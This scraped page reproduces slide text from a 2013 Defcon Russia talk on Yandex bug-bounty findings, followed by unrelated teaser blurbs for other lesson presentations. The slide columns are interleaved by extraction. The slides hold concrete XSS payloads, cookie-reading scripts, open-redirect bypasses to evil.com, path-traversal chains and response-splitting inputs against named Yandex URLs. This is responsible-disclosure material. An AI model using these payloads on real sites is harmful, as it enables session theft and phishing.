Без темы
<<  Xsite Produkte Your everyday partner in business travel  >>
21/02/2013 DCG #7812 г. Санкт-Петербург
21/02/2013 DCG #7812 г. Санкт-Петербург
21/02/2013 DCG #7812 г. Санкт-Петербург
21/02/2013 DCG #7812 г. Санкт-Петербург
Зачем мы участвовали
Зачем мы участвовали
Что предлагалось для поиска
Что предлагалось для поиска
Что предлагалось для поиска
Что предлагалось для поиска
10
10
10
10
9. Insufficient Transport Layer Protection
9. Insufficient Transport Layer Protection
8. Failure to Restrict URL Access
8. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
7. Insecure Cryptographic Storage
4. Insecure Direct Object References
4. Insecure Direct Object References
2. Cross Site Scripting (XSS)
2. Cross Site Scripting (XSS)
1. Injection
1. Injection
1. Injection
1. Injection
Чтение участков памяти
Чтение участков памяти
Misconfiguration
Misconfiguration
XML Injection
XML Injection
XML Injection
XML Injection
Картинки из презентации «Yandex bug bounty part 2» к уроку английского языка на тему «Без темы»

Автор: Yury. Чтобы познакомиться с картинкой полного размера, нажмите на её эскиз. Чтобы можно было использовать все картинки для урока английского языка, скачайте бесплатно презентацию «Yandex bug bounty part 2.ppt» со всеми картинками в zip-архиве размером 1290 КБ.

Yandex bug bounty part 2

содержание презентации «Yandex bug bounty part 2.ppt»
Сл Текст Сл Текст
121/02/2013 DCG #7812 г. 20ate?oper=delete&retpath=[URL]
Санкт-Петербург. Yandex bug bounty part 2. Ограничения: - Блокируются все ссылки
Сергей Бобров Алексей Осипов Positive включающие «://» - Если начинается с «/»,
Technologies. добавляется http://mail.yandex.ru Обходы:
2Зачем мы участвовали. Яндекс – первая [FireFox, Safari]:
в России компания, активно data:text/html,<html> [Chrome]:
заинтересованная в обеспечении http:/\evil.com [Chrome, IE]: \/evil.com
безопасности пользователей. В том числе с [Chrome, IE]: http:/%09/evil.com. Defcon
помощью самих пользователей своих сервисов Russia (DCG #7812). 20.
Мы не могли не помочь в этом начинании. 21Межсайтовое выполнение сценариев №1.
Defcon Russia (DCG #7812). 2. http://yandex.ru/yandsearch?text=Эмили
3Что предлагалось для поиска. Уотсон<script>alert(1)</script>
A1-Injection. A2-Cross Site Scripting В выдачу по запросу «Эмили Уотсон[XSS]»
(XSS). A3-Broken Authentication and были добавлены результаты по похожим
Session Management. A4-Insecure Direct запросам. Defcon Russia (DCG #7812). 21.
Object References. A5-Cross Site Request 22Межсайтовое выполнение сценариев №2.
Forgery (CSRF). A6-Security http://yandex.ru/yandsearch?text=\x3cimg+s
Misconfiguration. A7-Insecure c=x+\x6f\x6eerror=alert(1)\x3e var title =
Cryptographic Storage. A8-Failure to "\x3cXSS\x3e — Яндекс: ничего не
Restrict URL Access. A9-Insufficient найдено"; el =
Transport Layer Protection. document.createElement("i");
A10-Unvalidated Redirects and Forwards. el.innerHTML = title; Defcon Russia (DCG
Defcon Russia (DCG #7812). 3. #7812). 22.
410. Unvalidated Redirects and 23Межсайтовое выполнение сценариев №3.
Forwards. Входящие параметры пользователей часто
http://wt.yandex.ru/r?u=http://google.com попадают в запрос к clck.yandex.ru в
http://fmo-lp.ya.ru/options_blogs_import_c Request-Path без предварительной
eck.xml?ext_feed_host=google.com&final обработки. Пример (maps.yandex.ru,
retpage=http://google.com. Defcon Russia user_input=test):
(DCG #7812). 4. http://clck.yandex.ru/jclck/dtype=stred/bl
59. Insufficient Transport Layer -bla-bla/pos=4/text=test/user_input=test/r
Protection. Яндекс.диск – принимает tio=4.4.2/bla-bla-bla Ответ (выполняется в
само-подписанные сертификаты Многие (если контексте безопасности maps.yandex.ru): /*
не все) АПИ принимающие Oauth авторизацию counted */. Defcon Russia (DCG #7812). 23.
– принимают запросы без SSL. Defcon Russia 24Межсайтовое выполнение сценариев №3.
(DCG #7812). 5. Так же на сервере присутствует сценарий
68. Failure to Restrict URL Access. http://clck.yandex.ru/redir/*http://yandex
Сервисы, которые могут делать запросы ru/ HTTP/1.1 302 Redirect Location:
наружу, могут и посмотреть внутрь сети. http://yandex.ru/ Используя «/../»
http://webmaster.yandex.ru/sitemaptest.xml возможно изменить путь к сценарию и
http://webmaster.yandex.ru/robots.xml. запросить «redir». Таким образом можно
Defcon Russia (DCG #7812). 6. выполнить произвольный js файл в пределах
77. Insecure Cryptographic Storage. *.yandex.ru. Defcon Russia (DCG #7812).
Снова мобильные платформы: Yandex.Mail – 24.
пароль от аккаунта хранится в plaintext до 25Межсайтовое выполнение сценариев №3.
первого коннекта с сервером Yandex.Disk - Финальный payload:
сделав logout в приложении, токен ../../../../../../../../../../../redir/*ht
сохраняется (выставляется -1 в поле p://api-maps.yandex.ru/2.0.10/release/comb
is_logged), и снова можно тянуть файлы. ne.xml?modules=test&jsonp_prefix=alert
Defcon Russia (DCG #7812). 7. 'xss')//&# Заходим, нажимаем кнопку
86. Security Misconfiguration. «Найти»:
http://school-wiki.yandex.ru/ http://blogs.yandex.ru/search.xml?text=..%
/.htaccess/.php – получаем имена сценариев F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.
/_css/highlight_styles/pear.css = text/css %2F..%2Fredir%2F*http%3A%2F%2Fapi-maps.yan
/_css/highlight_styles/pear.css/.php = ex.ru%2F2.0.10%2Frelease%2Fcombine.xml%3Fm
text/html dules%3Dtest%26jsonp_prefix%3Dalert%28%27x
http://courses.school.yandex.net/ Старая s%27%29%2F%2F%26%23. Defcon Russia (DCG
версия Вики, с возможностью проведения #7812). 25.
XSS. Defcon Russia (DCG #7812). 8. 26Межсайтовое выполнение сценариев №3.
95. Cross Site Request Forgery (CSRF). Уязвимые сайты: maps.yandex.ru,
http://passport.yandex.ru/passport?mode=ch pogoda.yandex.ru, people.yandex.ru,
ngereg blogs.yandex.ru, news.yandex.ru,
http://passport.yandex.ru/passport?mode=tu market.yandex.ru, rabota.yandex.ru,
e http://ya.ru/json_do_vote.xml harita.yandex.com.tr Проверялось только
https://mail.yandex.ru/m/action_message_op поле поиска на главной странице каждого
rate?ids={ANY_ID}&oper=delete. Defcon сайта, если искать тщательнее, этих сайтов
Russia (DCG #7812). 9. станет намного больше ? Defcon Russia (DCG
104. Insecure Direct Object References. #7812). 26.
http://carddav.yandex.ru/ PROPFIND 27Межсайтовое выполнение сценариев №4.
/calendars/{ANY}%40yandex.ru/ HTTP/1.0. http://mail.yandex.ru/x'+alert(document.co
Defcon Russia (DCG #7812). 10. kie)+'x/%2e%2e/lite/inbox <script
113. Broken Authentication and Session type="text/javascript">
Management. Мобильные приложения – хранят PDA.prefix =
токены после логаута. Defcon Russia (DCG '/x'+alert(document.cookie)+'x/';
#7812). 11. </script> Эксплуатация возможна в
122. Cross Site Scripting (XSS). Safari, Internet Explorer. Defcon Russia
Reflected (DCG #7812). 27.
http://m.video.yandex.ru/#"><sv 28Чтение участков памяти. CVE-2012-1180
/onload=alert(1)> Use-after-free vulnerability in nginx
http://wt.yandex.ru/r?u={url-encoded-xss} before 1.0.14 and 1.1.x before 1.1.17
Stored: allows remote HTTP servers to obtain
http://moikrug.ru/master/profile/sites/ sensitive information from process memory
http://moikrug.ru/contacts/social/ via a crafted backend response, in
http://%username%.ya.ru/posts_add_wishlist conjunction with a client request.
xml http://pass.moikrug.ru/?retpath=http://yan
http://%username%.ya.ru/index_video.xml ex.ru%00aaaaaaaaaaaaaaaa
http://video.yandex.ru/ Много их. Defcon http://pass.moikrug.ru/?retpath=http://yan
Russia (DCG #7812). 12. ex.ru%0aSPLITTING%0a
131. Injection? Month of Yandex bugs http://pass.yandex.ru/?retpath=http://ya.r
hunting by @d0znpp. Defcon Russia (DCG &clean=yes%00aaaaaaaaaaaaa
#7812). 13. http://pass.yandex.ru/?retpath=http://ya.r
141. Injection! Defcon Russia (DCG &clean=yes%0aSPLITTING%0a. Defcon
#7812). 14. Russia (DCG #7812). 28.
15Как искал уязвимости. Ручной анализ 29Чтение участков памяти. Defcon Russia
Минимальная автоматизация Burp Repeater / (DCG #7812). 29.
Proxy + самописные плагины DOMinator 30Misconfiguration.
Простые, но не «шаблонные» уязвимости http://school-wiki.yandex.ru/ Настройка
Критичные сервисы. Defcon Russia (DCG php-fpm по мануалу с хабра … приводит к
#7812). 15. тому, что злоумышленник может читать
16Что нашел. Memory Disclosure: 2 XSS: 4 произвольные файлы и даже выполнять PHP
Open Redirect: 5 SSRF: 1 Response код из них. Defcon Russia (DCG #7812). 30.
Splitting: 2 CSRF: 1 Other: 2 Итого: 17. 31XML Injection. Почему так?
Defcon Russia (DCG #7812). 16. http://webmaster.yandex.ru/xsdtest.xml
17Где нашел. mail.yandex.ru 5 Можно валидировать произвольные документы
pass.(yandex|moikrug).ru 4 yandex.ru 2 Можно валидировать с помощью произвольных
calendar.yandex.ru 2 схем ???????? PROFIT Для каждого читаемого
maps/pogoda/blogs/news/market/… 1* документа нужно отдельно настраивать
cards.yandex.ru 1 zakladki.yandex.ru 1 резолв сущностей Незачем блокировать на
feedback.yandex.ru 1. Defcon Russia (DCG исходящие запросы безобидный валидатор
#7812). 17. XML. Defcon Russia (DCG #7812). 31.
18Обход ограничения перенаправления №1. 32XML Injection. Defcon Russia (DCG
http://zakladki.yandex.ru/redirect.xml?ret #7812). 32.
ath=[URL] Ограничения: - URL начинается с 33Что получилось. Читать содержимое
«/» или папок Читать некоторые файлы конфигов
«[a-zA-Z0-9-.]{0,}yandex.[a-z]{2,3}» Узнать, что в Яндексе используют слабые
Обходы: [Все браузеры]: пароли Монтируют множество сервисов как
http://yandex.ru.evil.com/ [Все браузеры]: локальные каталоги Не разделяют права
//evil.com/ [Кроме IE]: пользователей по сервисам. Defcon Russia
http://yandex.ru:x@evil.com/. Defcon (DCG #7812). 33.
Russia (DCG #7812). 18. 34Что увидели, но что не успели
19Обход ограничения перенаправления №2. эксплуатировать. Mongo серверы с доступным
http://pass.yandex.ru/logout?retpath=[URL] REST-интерфейсом
http://pass.moikrug.ru/?retpath=[URL] http://blog.ptsecurity.ru/2012/11/mongo-db
http://passport.yandex.ru/passport?mode=lo html Remote code execution Апдейты
out&retpath=[URL] Ограничения: - накатываются с помощью торрентов. Defcon
Принадлежность хоста [a-zA-Z0-9-.] Яндексу Russia (DCG #7812). 34.
Обходы: [Все браузеры]: 35Спасибо за внимание!
http://yandex.ru_.evil.com/. Defcon Russia SBobrov@ptsecurity.ru @Black2Fan
(DCG #7812). 19. AlOsipov@ptsecurity.ru @GiftsUngiven
20Обход ограничения перенаправления №3. Positive Technologies. Defcon Russia (DCG
http://mail.yandex.ru/m/action_message_ope #7812). 35.
Yandex bug bounty part 2.ppt
http://900igr.net/kartinka/anglijskij-jazyk/yandex-bug-bounty-part-2-63890.html
cсылка на страницу

Yandex bug bounty part 2

другие презентации на тему «Yandex bug bounty part 2»

«Английская кухня» - "B l o o d y M a r y". L E M O N C R E A M. Lunch. Ingredients: - chicken broth. Цель проекта. Traditional English food. Ingredients: - carrots, tomatoes. Ingredients: -1 onion -2 celery. P u d d I n g. Ingredients: -250 g flour. Английская кухня сохранила и донесла до наших дней много традиционных блюд.

«Classical music» - MUSIC OF THE CLASSICAL PERIOD. There are three sections of a sonata- Exposition,Development,Recapitulation. Mastered by Franz Joseph Haydn - he wrote 104 of them. Haydn was the first to write one - he also mastered them. The String Quartet. Beethoven, Haydn and Schubert has no success with writing operas.

«Рынок переводов» - Прагматики. Контроль качества. Пример рынка переводов. Онлайн технологии на рынке профессиональных услуг. Технологии TM. Редакт. Консерваторы. Управление проектами. Востребованность и препятствия. Рынок переводов. Области борьбы. Провидцы. Бюро переводов. Применение переводческими компаниями факсов.

«Особенности англоязычных стран» - Канада. США. Социокультурный портрет Великобритании. Культура и искусство. Новая Зеландия. Страны и люди. Формы работы. Экономика. Формирование межкультурной коммуникативной компетенции. Обычаи и традиции. Содержание учебного курса. Содружество наций. Социальная сфера общественной жизни. Образование.

«Страдательный залог» - Употребление Passive Voice. Книга была написана О.Уайльдом. Твой доклад читается хорошо. Sylvia resembles a Greek goddess. - Сильвия похожа на греческую богиню. Your mother lacks tact. - Твоей матери недостает такта. Комната была полна дыма. Палец порезали ножом. Наша работа должна быть закончена как можно скорее.

«Обучение иностранным языкам» - Поделки для выставки. Туристско-краеведческая деятельность. Подготовка к родительскому собранию. Задачи организации внеурочной деятельности. Обмен родителей воспоминаниями. Педагогические ситуации. Повышение педагогической культуры. Ролевая игра. Школьник знает и понимает общественную жизнь. Проектирование образовательного процесса.

Без темы

661 презентация
Урок

Английский язык

29 тем
Картинки